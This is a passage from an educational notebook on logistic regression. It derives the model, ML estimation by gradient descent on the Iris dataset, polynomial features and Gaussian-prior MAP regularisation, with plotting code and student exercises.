$$P_{Y|{\bf X}}(0|{\bf x}, {\bf w}) = 1-g({\bf w}^\intercal{\bf x})$$
where ${\bf w}$ is a parameter vector and $g(·)$ is the *logistic* function, which is defined by
$$g(t) = \frac{1}{1+\exp(-t)}$$
It is straightforward to see that the logistic function has the following properties:
- **P1**: Probabilistic output: $\quad 0 \le g(t) \le 1$
- **P2**: Symmetry: $\quad g(-t) = 1-g(t)$
- **P3**: Monotonicity: $\quad g'(t) = g(t)·[1-g(t)] \ge 0$
In the following we define a logistic function in python, and use it to plot a graphical representation.
**Exercise 1**: Verify properties P2 and P3.
**Exercise 2**: Implement a function to compute the logistic function, and use it to plot such function in the interval $[-6,6]$.
```
# Define the logistic function
def logistic(t):
#<SOL>
#</SOL>
# Plot the logistic function
t = np.arange(-6, 6, 0.1)
z = logistic(t)
plt.plot(t, z)
plt.xlabel('$t$', fontsize=14)
plt.ylabel('$g(t)$', fontsize=14)
plt.title('The logistic function')
plt.grid()
```
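Independently of the exercise solutions above, properties P1-P3 can be checked numerically on a grid. The `logistic_check` helper below is defined locally just for this check, so it does not spoil Exercise 2:

```python
import numpy as np

# Local helper, defined here only for this numeric check
def logistic_check(t):
    return 1.0 / (1.0 + np.exp(-t))

t = np.linspace(-6, 6, 121)
g_t = logistic_check(t)
assert np.all((g_t >= 0) & (g_t <= 1))            # P1: probabilistic output
assert np.allclose(logistic_check(-t), 1 - g_t)   # P2: symmetry g(-t) = 1 - g(t)
assert np.all(np.diff(g_t) > 0)                   # P3: g'(t) >= 0, so g is increasing
print('P1, P2 and P3 hold on the sampled grid')
```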
### 2.2. Classifiers based on the logistic model.
The MAP classifier under a logistic model will have the form
$$P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g({\bf w}^\intercal{\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0} \quad \frac{1}{2} $$
Therefore
$$
2 \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0} \quad
1 + \exp(-{\bf w}^\intercal{\bf x}) $$
which is equivalent to
$${\bf w}^\intercal{\bf x}
\quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad
0 $$
Therefore, the classifiers based on the logistic model are given by linear decision boundaries passing through the origin, ${\bf x} = {\bf 0}$.
```
# Weight vector:
w = [4, 8] # Try different weights
# Create a rectangular grid.
x_min = -1
x_max = 1
dx = x_max - x_min
h = float(dx) / 200
xgrid = np.arange(x_min, x_max, h)
xx0, xx1 = np.meshgrid(xgrid, xgrid)
# Compute the logistic map for the given weights
Z = logistic(w[0]*xx0 + w[1]*xx1)
# Plot the logistic map
fig = plt.figure()
ax = fig.add_subplot(projection='3d')  # fig.gca(projection=...) is removed in recent Matplotlib
ax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)
ax.contour(xx0, xx1, Z, levels=[0.5], colors='b', linewidths=(3,))
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
ax.set_zlabel('P(1|x,w)')
plt.show()
```
The next code fragment represents the output of the same classifier in the $x_0$-$x_1$ plane, encoding the value of the logistic function in the color of the representation.
```
CS = plt.contourf(xx0, xx1, Z)
CS2 = plt.contour(CS, levels=[0.5],
colors='m', linewidths=(3,))
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
### 2.3. Nonlinear classifiers.
The logistic model can be extended to construct non-linear classifiers by using non-linear data transformations. A general form for a nonlinear logistic regression model is
$$P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g[{\bf w}^\intercal{\bf z}({\bf x})] $$
where ${\bf z}({\bf x})$ is an arbitrary nonlinear transformation of the original variables. The boundary decision in that case is given by equation
$$
{\bf w}^\intercal{\bf z} = 0
$$
**Exercise 3**: Modify the code above to generate a 3D surface plot of the polynomial logistic regression model given by
$$
P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g(1 + 10 x_0 + 10 x_1 - 20 x_0^2 + 5 x_0 x_1 + x_1^2)
$$
```
# Weight vector:
w = [1, 10, 10, -20, 5, 1] # Try different weights
# Create a rectangular grid.
x_min = -1
x_max = 1
dx = x_max - x_min
h = float(dx) / 200
xgrid = np.arange(x_min, x_max, h)
xx0, xx1 = np.meshgrid(xgrid, xgrid)
# Compute the logistic map for the given weights
# Z = <FILL IN>
# Plot the logistic map
fig = plt.figure()
ax = fig.add_subplot(projection='3d')  # fig.gca(projection=...) is removed in recent Matplotlib
ax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
ax.set_zlabel('P(1|x,w)')
plt.show()
CS = plt.contourf(xx0, xx1, Z)
CS2 = plt.contour(CS, levels=[0.5],
colors='m', linewidths=(3,))
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
## 3. Inference
Remember that the idea of parametric classification is to use the training data set $\mathcal D = \{({\bf x}^{(k)}, y^{(k)}) \in {\mathbb{R}}^N \times \{0,1\}, k=0,\ldots,{K-1}\}$ to set the parameter vector ${\bf w}$ according to certain criterion. Then, the estimate $\hat{\bf w}$ can be used to compute the label prediction for any new observation as
$$\hat{y} = \arg\max_y P_{Y|{\bf X}}(y|{\bf x},\hat{\bf w}).$$
<img src="figs/parametric_decision.png" width=400>
We still need to choose a criterion to optimize for the selection of the parameter vector. In this notebook, we will discuss two different approaches to the estimation of ${\bf w}$:
* Maximum Likelihood (ML): $\hat{\bf w}_{\text{ML}} = \arg\max_{\bf w} P_{{\mathcal D}|{\bf W}}({\mathcal D}|{\bf w})$
* Maximum *A Posteriori* (MAP): $\hat{\bf w}_{\text{MAP}} = \arg\max_{\bf w} p_{{\bf W}|{\mathcal D}}({\bf w}|{\mathcal D})$
For the mathematical derivation of the logistic regression algorithm, the following representation of the logistic model will be useful: noting that
$$P_{Y|{\bf X}}(0|{\bf x}, {\bf w}) = 1-g[{\bf w}^\intercal{\bf z}({\bf x})]
= g[-{\bf w}^\intercal{\bf z}({\bf x})]$$
we can write
$$P_{Y|{\bf X}}(y|{\bf x}, {\bf w}) = g[\overline{y}{\bf w}^\intercal{\bf z}({\bf x})]$$
where $\overline{y} = 2y-1$ is a *symmetrized label* ($\overline{y}\in\{-1, 1\}$).
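This symmetrized-label identity is easy to verify numerically: for $y \in \{0,1\}$, $g(\overline{y}\,t)$ reproduces $P_{Y|{\bf X}}(y|{\bf x},{\bf w})$ with $t = {\bf w}^\intercal{\bf z}({\bf x})$. The helper `g` below is defined locally just for this check:

```python
import numpy as np

# Local helper, defined here only for this numeric check
def g(t):
    return 1.0 / (1.0 + np.exp(-t))

t = np.linspace(-5, 5, 101)   # stands in for w^T z(x)
p1 = g(t)                     # P(Y=1 | x, w)
p0 = 1 - p1                   # P(Y=0 | x, w)
for y, p in [(1, p1), (0, p0)]:
    ybar = 2 * y - 1          # symmetrized label in {-1, +1}
    assert np.allclose(g(ybar * t), p)
print('g(ybar * t) reproduces P(y | x, w) for both labels')
```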
### 3.1. Model assumptions
In the following, we will make the following assumptions:
- **A1**. (Logistic Regression): We assume a logistic model for the *a posteriori* probability of ${Y}$ given ${\bf X}$, i.e.,
$$P_{Y|{\bf X}}(y|{\bf x}, {\bf w}) = g[{\bar y}{\bf w}^\intercal{\bf z}({\bf x})].$$
- **A2**. All samples in ${\mathcal D}$ have been generated from the same distribution, $p_{{\bf X}, Y}({\bf x}, y)$.
- **A3**. Input variables $\bf x$ do not depend on $\bf w$. This implies that
$$p({\bf x}|{\bf w}) = p({\bf x})$$
- **A4**. Targets $y^{(0)}, \cdots, y^{(K-1)}$ are statistically independent given $\bf w$ and the inputs ${\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}$, that is:
$$P(y^{(0)}, \cdots, y^{(K-1)} | {\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) = \prod_{k=0}^{K-1} P(y^{(k)} | {\bf x}^{(k)}, {\bf w})$$
### 3.2. ML estimation.
The ML estimate is defined as
$$\hat{\bf w}_{\text{ML}} = \arg\max_{\bf w} P_{{\mathcal D}|{\bf W}}({\mathcal D}|{\bf w})$$
Using assumptions A2 and A3 above, we have that
\begin{align}
P_{{\mathcal D}|{\bf W}}({\mathcal D}|{\bf w}) & = p(y^{(0)}, \cdots, y^{(K-1)},{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}| {\bf w}) \\
& = P(y^{(0)}, \cdots, y^{(K-1)}|{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) \; p({\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}| {\bf w}) \\
& = P(y^{(0)}, \cdots, y^{(K-1)}|{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) \; p({\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)})\end{align}
Finally, using assumption A4, we can formulate the ML estimation of $\bf w$ as the resolution of the following optimization problem
\begin{align}
\hat {\bf w}_\text{ML} & = \arg \max_{\bf w} P(y^{(0)}, \cdots, y^{(K-1)}|{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) \\
& = \arg \max_{\bf w} \prod_{k=0}^{K-1} P(y^{(k)}|{\bf x}^{(k)}, {\bf w}) \\
& = \arg \max_{\bf w} \sum_{k=0}^{K-1} \log P(y^{(k)}|{\bf x}^{(k)}, {\bf w}) \\
& = \arg \min_{\bf w} \sum_{k=0}^{K-1} - \log P(y^{(k)}|{\bf x}^{(k)}, {\bf w})
\end{align}
where the arguments of the maximization or minimization problems of the last three lines are usually referred to as the **likelihood**, **log-likelihood** $\left[L(\bf w)\right]$, and **negative log-likelihood** $\left[\text{NLL}(\bf w)\right]$, respectively.
Now, using A1 (the logistic model)
\begin{align}
\text{NLL}({\bf w})
&= - \sum_{k=0}^{K-1}\log\left[g\left(\overline{y}^{(k)}{\bf w}^\intercal {\bf z}^{(k)}\right)\right] \\
&= \sum_{k=0}^{K-1}\log\left[1+\exp\left(-\overline{y}^{(k)}{\bf w}^\intercal {\bf z}^{(k)}\right)\right]
\end{align}
where ${\bf z}^{(k)}={\bf z}({\bf x}^{(k)})$.
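The two expressions for $\text{NLL}({\bf w})$ above are equal because $-\log g(t) = \log(1+e^{-t})$. A quick numerical check with toy data (assuming numpy; the `logistic` function and the random data are illustrative, not from the notebook):

```python
import numpy as np

def logistic(t):
    return 1.0 / (1.0 + np.exp(-t))

rng = np.random.default_rng(0)
Z = rng.normal(size=(20, 3))        # rows play the role of z^(k)
y = rng.integers(0, 2, size=20)     # toy binary labels
ybar = 2 * y - 1                    # symmetrized labels
w = rng.normal(size=3)

t = ybar * (Z @ w)
nll_a = -np.sum(np.log(logistic(t)))   # -sum_k log g(ybar^(k) w^T z^(k))
nll_b = np.sum(np.log1p(np.exp(-t)))   # sum_k log(1 + exp(-ybar^(k) w^T z^(k)))
assert np.isclose(nll_a, nll_b)
```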
It can be shown that $\text{NLL}({\bf w})$ is a convex and differentiable function of ${\bf w}$. Therefore, its minimum is a point with zero gradient.
\begin{align}
\nabla_{\bf w} \text{NLL}(\hat{\bf w}_{\text{ML}})
&= - \sum_{k=0}^{K-1}
\frac{\exp\left(-\overline{y}^{(k)}\hat{\bf w}_{\text{ML}}^\intercal {\bf z}^{(k)}\right) \overline{y}^{(k)} {\bf z}^{(k)}}
{1+\exp\left(-\overline{y}^{(k)}\hat{\bf w}_{\text{ML}}^\intercal {\bf z}^{(k)}
\right)} \\
&= - \sum_{k=0}^{K-1} \left[y^{(k)}-g(\hat{\bf w}_{\text{ML}}^\intercal {\bf z}^{(k)})\right] {\bf z}^{(k)} = 0
\end{align}
Unfortunately, $\hat{\bf w}_{\text{ML}}$ cannot be isolated from the above equation in closed form, so some iterative optimization algorithm must be used to search for the minimum.
### 3.2. Gradient descent.
A simple iterative optimization algorithm is <a href = https://en.wikipedia.org/wiki/Gradient_descent> gradient descent</a>.
\begin{align}
{\bf w}_{n+1} = {\bf w}_n - \rho_n \nabla_{\bf w} \text{NLL}({\bf w}_n)
\end{align}
where $\rho_n >0$ is the *learning step*.
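Before applying the rule to logistic regression, here is a minimal illustration of gradient descent on a toy convex function (not the logistic model): minimizing $f(w) = (w-3)^2$, whose gradient is $2(w-3)$.

```python
# Gradient descent on f(w) = (w - 3)^2, gradient f'(w) = 2 (w - 3)
w = 0.0
rho = 0.1                          # learning step
for n in range(100):
    w = w - rho * 2.0 * (w - 3.0)  # w_{n+1} = w_n - rho * grad f(w_n)
assert abs(w - 3.0) < 1e-6         # the iterates approach the minimizer w* = 3
```

With this step size the error shrinks by a constant factor $0.8$ per iteration; too large a step would make the iterates diverge, a point revisited below when discussing the learning step.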
Applying the gradient descent rule to logistic regression, we get the following algorithm:
\begin{align}
{\bf w}_{n+1} &= {\bf w}_n
+ \rho_n \sum_{k=0}^{K-1} \left[y^{(k)}-g({\bf w}_n^\intercal {\bf z}^{(k)})\right] {\bf z}^{(k)}
\end{align}
Defining vectors
\begin{align}
{\bf y} &= [y^{(0)},\ldots,y^{(K-1)}]^\top \\
\hat{\bf p}_n &= [g({\bf w}_n^\top {\bf z}^{(0)}), \ldots, g({\bf w}_n^\top {\bf z}^{(K-1)})]^\top
\end{align}
and matrix
\begin{align}
{\bf Z} = \left[{\bf z}^{(0)},\ldots,{\bf z}^{(K-1)}\right]^\top
\end{align}
we can write
\begin{align}
{\bf w}_{n+1} &= {\bf w}_n
+ \rho_n {\bf Z}^\top \left({\bf y}-\hat{\bf p}_n\right)
\end{align}
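The equivalence between the sample-by-sample update and this matrix form can be checked numerically. A quick sketch with toy data (assuming numpy; `logistic` is restated so the snippet is self-contained):

```python
import numpy as np

def logistic(t):
    return 1.0 / (1.0 + np.exp(-t))

rng = np.random.default_rng(1)
K, dim = 15, 4
Z = rng.normal(size=(K, dim))              # rows are z^(k)
y = rng.integers(0, 2, size=K).astype(float)
w = rng.normal(size=dim)
rho = 0.05

# Per-sample form: w + rho * sum_k [y^(k) - g(w^T z^(k))] z^(k)
grad_sum = sum((y[k] - logistic(w @ Z[k])) * Z[k] for k in range(K))
w_loop = w + rho * grad_sum

# Matrix form: w + rho * Z^T (y - p)
p = logistic(Z @ w)
w_mat = w + rho * Z.T @ (y - p)
assert np.allclose(w_loop, w_mat)
```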
In the following, we will explore the behavior of the gradient descent method using the Iris Dataset.
#### 3.2.1 Example: Iris Dataset.
As an illustration, consider the <a href = http://archive.ics.uci.edu/ml/datasets/Iris> Iris dataset </a>, taken from the <a href=http://archive.ics.uci.edu/ml/> UCI Machine Learning repository</a>. This data set contains 3 classes of 50 instances each, where each class refers to a type of iris plant (*setosa*, *versicolor* or *virginica*). Each instance contains 4 measurements of given flowers: sepal length, sepal width, petal length and petal width, all in centimeters.
We will try to fit the logistic regression model to discriminate between two classes using only two attributes.
First, we load the dataset and split them in training and test subsets.
```
# Adapted from a notebook by Jason Brownlee
import csv
import random

def loadDataset(filename, split):
xTrain = []
cTrain = []
xTest = []
cTest = []
with open(filename, 'r') as csvfile:
lines = csv.reader(csvfile)
dataset = list(lines)
for i in range(len(dataset)-1):
for y in range(4):
dataset[i][y] = float(dataset[i][y])
item = dataset[i]
if random.random() < split:
xTrain.append(item[0:4])
cTrain.append(item[4])
else:
xTest.append(item[0:4])
cTest.append(item[4])
return xTrain, cTrain, xTest, cTest
xTrain_all, cTrain_all, xTest_all, cTest_all = loadDataset('iris.data', 0.66)
nTrain_all = len(xTrain_all)
nTest_all = len(xTest_all)
print('Train:', nTrain_all)
print('Test:', nTest_all)
```
Now, we select two classes and two attributes.
```
import numpy as np

# Select attributes
i = 0 # Try 0,1,2,3
j = 1 # Try 0,1,2,3 with j!=i
# Select two classes
c0 = 'Iris-versicolor'
c1 = 'Iris-virginica'
# Select two coordinates
ind = [i, j]
# Take training test
X_tr = np.array([[xTrain_all[n][k] for k in ind] for n in range(nTrain_all)
                 if cTrain_all[n]==c0 or cTrain_all[n]==c1])
C_tr = [cTrain_all[n] for n in range(nTrain_all)
if cTrain_all[n]==c0 or cTrain_all[n]==c1]
Y_tr = np.array([int(c==c1) for c in C_tr])
n_tr = len(X_tr)
# Take test set
X_tst = np.array([[xTest_all[n][k] for k in ind] for n in range(nTest_all)
                  if cTest_all[n]==c0 or cTest_all[n]==c1])
C_tst = [cTest_all[n] for n in range(nTest_all)
if cTest_all[n]==c0 or cTest_all[n]==c1]
Y_tst = np.array([int(c==c1) for c in C_tst])
n_tst = len(X_tst)
```
#### 3.2.2. Data normalization
Normalization of data is a common pre-processing step in many machine learning algorithms. Its goal is to get a dataset where all input coordinates have a similar scale. Learning algorithms usually show less instabilities and convergence problems when data are normalized.
We will define a normalization function that returns a training data matrix with zero sample mean and unit sample variance.
```
def normalize(X, mx=None, sx=None):
# Compute means and standard deviations
if mx is None:
mx = np.mean(X, axis=0)
if sx is None:
sx = np.std(X, axis=0)
# Normalize
X0 = (X-mx)/sx
return X0, mx, sx
```
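A quick sanity check of the normalization (assuming numpy; `normalize` is restated here so the snippet is self-contained):

```python
import numpy as np

def normalize(X, mx=None, sx=None):
    # Same function as above, restated so this check is self-contained
    if mx is None:
        mx = np.mean(X, axis=0)
    if sx is None:
        sx = np.std(X, axis=0)
    return (X - mx) / sx, mx, sx

X = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]])
X0, mx, sx = normalize(X)
assert np.allclose(X0.mean(axis=0), 0.0)   # zero sample mean
assert np.allclose(X0.std(axis=0), 1.0)    # unit sample standard deviation

# Reusing the training statistics applies the same affine map to new data:
X0_new, _, _ = normalize(np.array([[2.0, 20.0]]), mx, sx)
assert np.allclose(X0_new, 0.0)            # the training mean maps to 0
```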
Now, we can normalize training and test data. Observe in the code that the same transformation must be applied to training and test data. This is why the test data are normalized using the means and the standard deviations computed on the training set.
```
# Normalize data
Xn_tr, mx, sx = normalize(X_tr)
Xn_tst, mx, sx = normalize(X_tst, mx, sx)
```
The following code generates a scatter plot of the normalized training data.
```
import matplotlib.pyplot as plt

# Separate components of x into different arrays (just for the plots)
x0c0 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==0]
x1c0 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==0]
x0c1 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==1]
x1c1 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==1]
# Scatterplot.
labels = {'Iris-setosa': 'Setosa',
'Iris-versicolor': 'Versicolor',
'Iris-virginica': 'Virginica'}
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.legend(loc='best')
plt.axis('equal')
plt.show()
```
In order to apply the gradient descent rule, we need to define two methods:
- A `fit` method, that receives the training data and returns the model weights and the value of the negative log-likelihood during all iterations.
- A `predict` method, that receives the model weights and a set of inputs, and returns the posterior class probabilities for those inputs, as well as the corresponding class predictions.
```
def logistic(t):
    # Logistic (sigmoid) function, g(t) = 1 / (1 + exp(-t))
    return 1.0 / (1.0 + np.exp(-t))

def logregFit(Z_tr, Y_tr, rho, n_it):
# Data dimension
n_dim = Z_tr.shape[1]
# Initialize variables
nll_tr = np.zeros(n_it)
pe_tr = np.zeros(n_it)
Y_tr2 = 2*Y_tr - 1 # Transform labels into binary symmetric.
w = np.random.randn(n_dim,1)
# Running the gradient descent algorithm
for n in range(n_it):
# Compute posterior probabilities for weight w
p1_tr = logistic(np.dot(Z_tr, w))
# Compute negative log-likelihood
# (note that this is not required for the weight update, only for nll tracking)
nll_tr[n] = np.sum(np.log(1 + np.exp(-np.dot(Y_tr2*Z_tr, w))))
# Update weights
w += rho*np.dot(Z_tr.T, Y_tr - p1_tr)
return w, nll_tr
def logregPredict(Z, w):
# Compute posterior probability of class 1 for weights w.
p = logistic(np.dot(Z, w)).flatten()
# Class
D = [int(round(pn)) for pn in p]
return p, D
```
We can test the behavior of the gradient descent method by fitting a logistic regression model with ${\bf z}({\bf x}) = (1, {\bf x}^\top)^\top$.
```
# Parameters of the algorithms
rho = float(1)/50 # Learning step
n_it = 200 # Number of iterations
# Compute Z's
Z_tr = np.c_[np.ones(n_tr), Xn_tr]
Z_tst = np.c_[np.ones(n_tst), Xn_tst]
n_dim = Z_tr.shape[1]
# Convert target arrays to column vectors
Y_tr2 = Y_tr[np.newaxis].T
Y_tst2 = Y_tst[np.newaxis].T
# Running the gradient descent algorithm
w, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)
# Classify training and test data
p_tr, D_tr = logregPredict(Z_tr, w)
p_tst, D_tst = logregPredict(Z_tst, w)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
# NLL plot.
plt.plot(range(n_it), nll_tr,'b.:', label='Train')
plt.xlabel('Iteration')
plt.ylabel('Negative Log-Likelihood')
plt.legend()
print('The optimal weights are:')
print(w)
print('The final error rates are:')
print('- Training:', pe_tr)
print('- Test:', pe_tst)
print('The NLL after training is', nll_tr[len(nll_tr)-1])
```
#### 3.2.3. Free parameters
Under certain conditions, the gradient descent method can be shown to converge asymptotically (i.e., as the number of iterations goes to infinity) to the ML estimate of the logistic model. However, in practice, the final estimate of the weights ${\bf w}$ depends on several factors:
- Number of iterations
- Initialization
- Learning step
**Exercise 4**: Visualize the variability of gradient descent caused by initializations. To do so, fix the number of iterations to 200 and the learning step, and execute the gradient descent 100 times, storing the training error rate of each execution. Plot the histogram of the error rate values.
Note that you can do this exercise with a loop over the 100 executions, including the code in the previous code cell inside the loop, with some proper modifications. To plot a histogram of the values in array `p` with `n` bins, you can use `plt.hist(p, n)`.
##### 3.2.3.1. Learning step
The learning step, $\rho$, is a free parameter of the algorithm. Its choice is critical for the convergence of the algorithm. Too large values of $\rho$ make the algorithm diverge; for too small values, convergence is very slow and many iterations are required to reach a good solution.
**Exercise 5**: Observe the evolution of the negative log-likelihood with the number of iterations for different values of $\rho$. It is easy to check that, for large enough $\rho$, the gradient descent method does not converge. Can you estimate (through manual observation) an approximate value of $\rho$ marking the boundary between convergence and divergence?
**Exercise 6**: In this exercise we explore the influence of the learning step more systematically. Use the code in the previous exercises to compute, for every value of $\rho$, the average error rate over 100 executions. Plot the average error rate vs. $\rho$.
Note that you should explore the values of $\rho$ in a logarithmic scale. For instance, you can take $\rho = 1, \frac{1}{10}, \frac{1}{100}, \frac{1}{1000}, \ldots$
In practice, the selection of $\rho$ may be a matter of trial and error. There is also some theoretical evidence that the learning step should decrease over time towards zero, and that the sequence $\rho_n$ should satisfy two conditions:
- C1: $\sum_{n=0}^{\infty} \rho_n^2 < \infty$ (decrease fast enough)
- C2: $\sum_{n=0}^{\infty} \rho_n = \infty$ (but not too fast)
For instance, we can take $\rho_n = \frac{1}{n+1}$. Another common choice is $\rho_n = \frac{\alpha}{1+\beta n}$, where $\alpha$ and $\beta$ are also free parameters that can be selected by trial and error or with some heuristic method.
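The two conditions can be illustrated numerically for the schedule $\rho_n = 1/(n+1)$: the partial sums of $\rho_n^2$ stay bounded (C1), while the partial sums of $\rho_n$ keep growing without bound (C2). A quick sketch (assuming numpy):

```python
import numpy as np

n = np.arange(1, 200001, dtype=float)   # n = 1, 2, ..., 200000
rho = 1.0 / n                           # the schedule rho_n = 1/n

# C1: partial sums of rho_n^2 are bounded (they converge to pi^2/6)
assert np.sum(rho**2) < np.pi**2 / 6
# C2: partial sums of rho_n (the harmonic series) keep growing
assert np.sum(rho) > 12
```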
#### 3.2.4. Visualizing the posterior map.
We can also visualize the posterior probability map estimated by the logistic regression model for the estimated weights.
```
# Create a rectangular grid.
x_min, x_max = Xn_tr[:, 0].min(), Xn_tr[:, 0].max()
y_min, y_max = Xn_tr[:, 1].min(), Xn_tr[:, 1].max()
dx = x_max - x_min
dy = y_max - y_min
h = dy /400
xx, yy = np.meshgrid(np.arange(x_min - 0.1 * dx, x_max + 0.1 * dx, h),
                     np.arange(y_min - 0.1 * dy, y_max + 0.1 * dy, h))
X_grid = np.array([xx.ravel(), yy.ravel()]).T
# Compute Z's
Z_grid = np.c_[np.ones(X_grid.shape[0]), X_grid]
# Compute the classifier output for all samples in the grid.
pp, dd = logregPredict(Z_grid, w)
# Paint output maps
pylab.rcParams['figure.figsize'] = 6, 6 # Set figure size
# Put the result into a color plot
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.legend(loc='best')
plt.axis('equal')
pp = pp.reshape(xx.shape)
CS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)
plt.contour(xx, yy, pp, levels=[0.5],
colors='b', linewidths=(3,))
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
#### 3.2.5. Polynomial Logistic Regression
The error rates of the logistic regression model can be potentially reduced by using polynomial transformations.
To compute the polynomial transformation up to a given degree, we can use the `PolynomialFeatures` method in `sklearn.preprocessing`.
```
from sklearn.preprocessing import PolynomialFeatures

# Parameters of the algorithms
rho = float(1)/50 # Learning step
n_it = 500 # Number of iterations
g = 5 # Degree of polynomial
# Compute Z_tr
poly = PolynomialFeatures(degree=g)
Z_tr = poly.fit_transform(Xn_tr)
# Normalize columns (this is useful to make algorithms more stable).
Zn, mz, sz = normalize(Z_tr[:,1:])
Z_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)
# Compute Z_tst
Z_tst = poly.transform(Xn_tst)
Zn, mz, sz = normalize(Z_tst[:,1:], mz, sz)
Z_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)
# Convert target arrays to column vectors
Y_tr2 = Y_tr[np.newaxis].T
Y_tst2 = Y_tst[np.newaxis].T
# Running the gradient descent algorithm
w, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)
# Classify training and test data
p_tr, D_tr = logregPredict(Z_tr, w)
p_tst, D_tst = logregPredict(Z_tst, w)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
# NLL plot.
plt.plot(range(n_it), nll_tr,'b.:', label='Train')
plt.xlabel('Iteration')
plt.ylabel('Negative Log-Likelihood')
plt.legend()
print('The optimal weights are:')
print(w)
print('The final error rates are:')
print('- Training:', pe_tr)
print('- Test:', pe_tst)
print('The NLL after training is', nll_tr[len(nll_tr)-1])
```
Visualizing the posterior map, we can see that the polynomial transformation produces nonlinear decision boundaries.
```
# Compute Z_grid
Z_grid = poly.transform(X_grid)
n_grid = Z_grid.shape[0]
Zn, mz, sz = normalize(Z_grid[:,1:], mz, sz)
Z_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)
# Compute the classifier output for all samples in the grid.
pp, dd = logregPredict(Z_grid, w)
pp = pp.reshape(xx.shape)
# Paint output maps
pylab.rcParams['figure.figsize'] = 6, 6 # Set figure size
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.axis('equal')
plt.legend(loc='best')
CS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)
plt.contour(xx, yy, pp, levels=[0.5],
colors='b', linewidths=(3,))
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
## 4. Regularization and MAP estimation.
An alternative to the ML estimation of the weights in logistic regression is Maximum A Posteriori estimation. Modelling the logistic regression weights as a random variable with prior distribution $p_{\bf W}({\bf w})$, the MAP estimate is defined as
$$
\hat{\bf w}_{\text{MAP}} = \arg\max_{\bf w} p({\bf w}|{\mathcal D})
$$
The posterior density $p({\bf w}|{\mathcal D})$ is related to the likelihood function and the prior density of the weights, $p_{\bf W}({\bf w})$ through the Bayes rule
$$
p({\bf w}|{\mathcal D}) =
\frac{P\left({\mathcal D}|{\bf w}\right) \; p_{\bf W}({\bf w})}
{p\left({\mathcal D}\right)}
$$
In general, the denominator in this expression cannot be computed analytically. However, it is not required for MAP estimation because it does not depend on ${\bf w}$. Therefore, the MAP solution is given by
\begin{align}
\hat{\bf w}_{\text{MAP}} & = \arg\max_{\bf w} \left\{ P\left({\mathcal D}|{\bf w}\right) \; p_{\bf W}({\bf w}) \right\}\\
& = \arg\max_{\bf w} \left\{ L({\mathbf w}) + \log p_{\bf W}({\bf w})\right\} \\
& = \arg\min_{\bf w} \left\{ \text{NLL}({\mathbf w}) - \log p_{\bf W}({\bf w})\right\}
\end{align}
In the light of this expression, we can conclude that the MAP solution is affected by two terms:
- The likelihood, which takes large values for parameter vectors $\bf w$ that fit well the training data (smaller $\text{NLL}$ values)
- The prior distribution of weights $p_{\bf W}({\bf w})$, which expresses our *a priori* preference for some solutions. **Usually, we recur to prior distributions that take large values when $\|{\bf w}\|$ is small (associated to smooth classification borders).**
We can check that the MAP criterion adds a penalty term to the ML objective, that penalizes parameter vectors for which the prior distribution of weights takes small values.
### 4.1 MAP estimation with Gaussian prior
If we assume that ${\bf W}$ is a zero-mean Gaussian random vector with covariance matrix $v{\bf I}$,
$$
p_{\bf W}({\bf w}) = \frac{1}{(2\pi v)^{N/2}} \exp\left(-\frac{1}{2v}\|{\bf w}\|^2\right)
$$
the MAP estimate becomes
\begin{align}
\hat{\bf w}_{\text{MAP}}
&= \arg\min_{\bf w} \left\{\text{NLL}({\bf w}) + \frac{1}{C}\|{\bf w}\|^2
\right\}
\end{align}
where $C = 2v$. Noting that
